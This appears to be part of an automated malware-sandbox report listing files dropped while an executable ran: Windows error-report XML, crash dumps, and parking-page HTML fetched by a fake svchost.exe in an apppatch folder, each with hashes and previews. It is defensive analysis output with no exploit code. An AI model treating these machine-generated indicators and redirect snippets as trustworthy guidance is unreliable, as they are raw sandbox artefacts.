                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.4.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                            Entropy (8bit):3.7117476919797907
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJD4686YWCSURgmfv/pr189b5gsfOTm:R6lXJ8686YzSURgmfvQ5zfL
                                                                                                                                                                                                            MD5:1CA21D21636597F7408F00AFDAFEEA2F
                                                                                                                                                                                                            SHA1:21E7456A5366E472A607F9D0703B7108FF90DD04
                                                                                                                                                                                                            SHA-256:F30959B7E57DECD7CEA0D484F1AC509A15808BDEA5ACECEFA78A2787774B7D26
                                                                                                                                                                                                            SHA-512:D0F48D8B94AAF8C98CF83EA788E8E4262BD0D982922AF391260D773BDB982499E3B25E11C58A4342DD32D0CA53137D464A47C7EE49C705C81F392E5FDF337BA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.0.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.55170746653968
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYPLAYm8M4JN/mcF0r+q8Uepiq9SZcZdd:uIjf/I7ee7VaLNJN/k9+irZcZdd
                                                                                                                                                                                                            MD5:A3979F468E970D67C99C6FEA0B2F1C35
                                                                                                                                                                                                            SHA1:89676124ECC994E49EB0B99F1F0762998699AA93
                                                                                                                                                                                                            SHA-256:1D8E68C852FB5CB74BAB916AEB48430B739E75964C4AF4384924B5FDE973F5B4
                                                                                                                                                                                                            SHA-512:53F78E6EA3096252DCAA87A9E5DDCA0F6CF29E0A581D075B3D3564D7C321A6BC6E325513FB16DC5FFCC9599E9051D1955DE98C567FF2345122A1FDB301263984
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.553300543409523
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYNYm8M4JN/mcFms+q8Ue8iq9SZcZid:uIjf/I7ee7VRJN/8s9HirZcZid
                                                                                                                                                                                                            MD5:CEB3B6CA8E3820260D552C9ED00A4779
                                                                                                                                                                                                            SHA1:BCDB7682B3BEB91BC59ECF8F00AFC89D345A785A
                                                                                                                                                                                                            SHA-256:17C324F9E96556C236A668CEF2E8CB05F618A70B10A6D4AE0E82A51305A7F456
                                                                                                                                                                                                            SHA-512:F1C90F2BFB2F167CBEF018D2C738F94A45F856E878B41DBE2115B45FA1E8CCD0C064EF91920B71B6C4CCFFCEA1CA528B8D205501EA00DF674D033069FFE67E15
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:42 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):75768
                                                                                                                                                                                                            Entropy (8bit):1.9867576875473307
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:AmExvXAcyfu1izrVQX06ZzHO0I4QumxS8JFiu02bMjyYUbi19:AxXAc2uAzMZzu1wu02MjyG
                                                                                                                                                                                                            MD5:8EAB901E9230C46FA12E72C4F34E01A2
                                                                                                                                                                                                            SHA1:A031D7EDBFC115D9B8AA8C1A86F32842410C26F1
                                                                                                                                                                                                            SHA-256:191016E7F7460BCAB9ACD47D03345C51FC6A047D1B2788BD4B53FD14820126B7
                                                                                                                                                                                                            SHA-512:6900C9A02094BF4CF72B3C9F5F5502EA66CE9F0E42A5F30E5F5B45B7E771FAE56718238E72020C0070079074FF0322500C5143E71C768475FA0E050F78C9473A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8412
                                                                                                                                                                                                            Entropy (8bit):3.7111878559419442
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJXF656YWQSURgmfv/prE89b5kMVsfZTm:R6lXJV656YRSURgmfvD5kMufg
                                                                                                                                                                                                            MD5:8B8B65F080B8F7C95BE58E373B799B1D
                                                                                                                                                                                                            SHA1:9D4BCE21A4645333BB2E9D4CDC39C4AEC4B6E228
                                                                                                                                                                                                            SHA-256:73E522943CE366D9DC0AE0D9A64F98BC35F97494C1008190BF7467BF818A4B14
                                                                                                                                                                                                            SHA-512:67D738E103832ACCC9A6FB7ABDCB1C2364CEDB3DAFB227019D4ECB5F83FED2C7805B78A0727B79A32BD5B2A52942B7C195DC2C62453B2D62828E472D7235B056
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7496</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.553358068733188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYqYm8M4JN/mcFS+q8UejDzHiq9SZcZTd:uIjf/I7ee7VyJN/E98jirZcZTd
                                                                                                                                                                                                            MD5:17C6D9A0F02DB8B74860CC72CEF1B51D
                                                                                                                                                                                                            SHA1:60E9D0ED1947D5D4C726920E79D75C461E342481
                                                                                                                                                                                                            SHA-256:CF385C0C21B79B9F2B620CA6A7FFFAC475AA8FC55293B8F1063E13FE361AD30F
                                                                                                                                                                                                            SHA-512:1369CA2EF83C6C500D242013B417CFD6AA6E2D66213DC04E111EBB165B44E3A40B1F56604BF2C862CAE0E002659168F69F89A8E061192F42F1EBB0F4671C26A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:25:43 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):95722
                                                                                                                                                                                                            Entropy (8bit):1.8148068482208253
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:LsBCCzOkXo20Sv+BIikvI2zVEmri93YM9:LsAd2zdbY3F
                                                                                                                                                                                                            MD5:0608F8126224868EC417A5035A31F155
                                                                                                                                                                                                            SHA1:7027F75A947C3ED49997F116DCD337896FC285E6
                                                                                                                                                                                                            SHA-256:C725985373EF60A6B548333A261950C937C180D975D0EACB43F320C943423D4E
                                                                                                                                                                                                            SHA-512:82845E3B362321CDB0EAF251A802CAEC112319FD5E0FD44BC68CB7D641421FFA278648E7C63C8FC88DC90C8DBFA0CA48298243868C628E60F2909B2151A11EE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                            Entropy (8bit):3.7105770756296135
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJ9e6vL6YWPmSUPgmfv/prB89bwIsfXQm:R6lXJk6T6YfSUPgmfv8w7fF
                                                                                                                                                                                                            MD5:D5E529C318B1D120B0D482E65E11CBEE
                                                                                                                                                                                                            SHA1:EDD46B8F27FB634AB58BBFD9FC341C9BD17B14EA
                                                                                                                                                                                                            SHA-256:C6E7DF7D86F0666A378B229C96F934E2985DDCC22E8F65283BEA7F8764AEEF4D
                                                                                                                                                                                                            SHA-512:21BC703521FDA1D4470EC2EA8136718305DC6B5E16E03FA92F29DB2A952AFAB8BAA2EC47F4A8600D8836DDBDB9CB3C713ADF32B8429157796B525A6C9BEA43C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7472</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4689
                                                                                                                                                                                                            Entropy (8bit):4.552909948283467
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zslJg77aI9kPWpW8VYSYm8M4JN/mcFZtF+q8Ueg+iq9SZcZId:uIjf/I7ee7V+JN/vtF9L+irZcZId
                                                                                                                                                                                                            MD5:F3D745F6DE16B7E71F158F0E9FBAE6F2
                                                                                                                                                                                                            SHA1:D8D8FBCDB7459AD30B7465383CAFB38F2C668FA8
                                                                                                                                                                                                            SHA-256:01365D32BC152BC0DD095938439C44F0AB46D8E2CF79ED03003DDB23ED442DB3
                                                                                                                                                                                                            SHA-512:F7D0CBE9B23083CF0D9645E44A5AD03A4717025420A6D008D1376596DC6BD94192A41DF955D8DD12938D3C86BECEAB30C231A9FDF9342A0581687DF16B9D9E94
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583708" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43073
                                                                                                                                                                                                            Entropy (8bit):6.064287387128941
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:CiBtrifZVO7Wg3hIBYzwyXY7JXO4On2pETjNl/yndiGPtYbcq:C8Cg3rrkFO4On2pgh0ZPtYbcq
                                                                                                                                                                                                            MD5:82FC9A40264F88E6415B3105CE175E0B
                                                                                                                                                                                                            SHA1:5209FE92E6AD71C1345786ED60917C64456FEC5D
                                                                                                                                                                                                            SHA-256:406573D06502DBD7E582B08910A66DF11E85B0B6F1EA32BDB9528FDD9C200E82
                                                                                                                                                                                                            SHA-512:E2D2257F3DAFF2AB1161C0B674B69ECACABDA6C206491AC925337017814A8D26139B2EBCA29463C50BB2C883852BCFA27F6950CAC2CC8694B1DC2386A555F9B9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Z8eHwAvqAh.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):211463
                                                                                                                                                                                                            Entropy (8bit):7.809244509262147
                                                                                                                                                                                                            Encrypted:false
